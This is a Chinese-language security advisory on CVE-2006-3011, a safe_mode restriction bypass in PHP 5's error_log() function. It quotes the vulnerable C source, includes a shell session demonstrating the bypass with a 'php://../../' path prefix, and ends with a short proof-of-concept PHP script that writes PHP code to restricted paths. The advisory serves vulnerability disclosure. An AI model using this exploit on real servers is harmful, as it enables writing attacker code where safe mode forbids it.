BUGTRAQ ID: 18645
CVE(CAN) ID: CVE-2006-3011
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP的error_log()函数中存在安全模式限制绕过漏洞:
PHP5:
-2013-2050—
PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
php_stream *stream = NULL;
switch (opt_err) {
case 1: /*send an email */
{
#if HAVE_SENDMAIL
if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
return FAILURE;
}
#else
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
return FAILURE;
#endif
}
break;
case 2: /*send to an address */
php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
return FAILURE;
break;
case 3: /*save to a file */
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERROR
S, NULL);
if (!stream)
return FAILURE;
php_stream_write(stream, message, strlen(message));
php_stream_close(stream);
break;
default:
php_log_err(message TSRMLS_CC);
break;
}
return SUCCESS;
在选项3中:
漏洞存在于php_stream_open_wrapper()。如果用户提供了“prefix://…/…/”的话,IGNORE_URL就会关闭safe_mode。
cxib# php -r ‘error_log("<? echo "cx"; ?>", 3, "/www/temp/sr.php"
);’
Warning: error_log(): SAFE MODE Restriction in effect. The script whose uid is 0 is not allowed to a
ccess /www/temp owned by uid
80 in Command line code on line 1
Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on
line 1
cxib# php -r ‘error_log("<? echo "cx"; ?>", 3, "php://…/…/www/temp
/sr.php");’
cxib# ls -la /www/temp/sr.php
拥有加载任意PHP代码或指定error_log()函数调用参数权限的用户可以利用这个漏洞从目标系统读取或写入受限文件。
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href=“http://www.php.net” target=“_blank”>http://www.php.net</a>
<?php
$file=""; # FILENAME
error_log("<? echo \"cx\"; ?>", 3, "php://../../".$file);
?>